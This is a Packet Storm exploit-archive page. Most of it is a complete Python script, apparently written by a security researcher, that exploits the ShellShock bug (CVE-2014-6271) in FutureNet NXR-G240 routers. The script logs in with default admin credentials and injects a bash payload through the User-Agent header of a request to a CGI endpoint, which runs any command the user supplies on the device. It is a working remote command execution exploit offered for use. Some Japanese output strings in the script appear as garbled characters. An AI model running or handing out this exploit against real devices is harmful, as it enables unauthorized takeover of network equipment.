what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FutureNet NXR-G240 Series ShellShock Command Injection

FutureNet NXR-G240 Series ShellShock Command Injection
Posted Dec 7, 2018
Authored by Nassim Asrir

FutureNet NXR-G240 Series remote shellshock command injection exploit.

tags | exploit, remote
advisories | CVE-2014-6271
SHA-256 | f78dbb3e60f1c9d3724509318e7a6186453a1ba3aa5bffb1f8e6b9d5aa925d7b

FutureNet NXR-G240 Series ShellShock Command Injection

Change Mirror Download
# -*- coding: utf-8 -*-
# Title: FutureNet NXR-G240 Series - "ShellShock" Remote Command Injection
# Date: 2018-06-12
# Author: Nassim Asrir
# You have a Q ? Contact me at: https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Vendor: http://www.centurysys.co.jp/
# CVE: CVE-2014-6271
# Greetz to : Nadia BENCHIKHA for the great help.
# Example:
# [root@parrot]a[/home/sniperpex/Desktop]
# #python ./exploit.py http://server -u admin -p admin -c ps

import urllib2
import base64
import bs4
import sys
import argparse
reload(sys)
sys.setdefaultencoding('utf8')

ap = argparse.ArgumentParser(description="FutureNet NXR-G240 Series - ShellShock Remote Command Injection ")

ap.add_argument("host", help="(Example: http://127.0.0.1).")

ap.add_argument("-u", "--user", help="Admin username (Default: admin)")

ap.add_argument("-p", "--password", help="Admin password (Default: admin)")

ap.add_argument("-c", "--cmd", help="Command to run.")

args = ap.parse_args()

request = urllib2.Request(args.host+"/cgi-bin/information.cgi?section=arp&module=system&command=execute")

base64string = base64.encodestring('%s:%s' % (args.user, args.password)).replace('\n', '')

print '[+] Authentication & Exploit in progress...'

request.add_header("Authorization", "Basic %s" % base64string)

request.add_header("User-Agent", "() { :;}; /bin/bash -c "+str(args.cmd))

response = urllib2.urlopen(request)

soup = bs4.BeautifulSoup(response, 'html.parser')

for textarea in soup.find_all('pre'):

print textarea.get_text().replace("# ARPaea +-",'').replace("e!"c$?oaSSaa3/4aa",'')
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close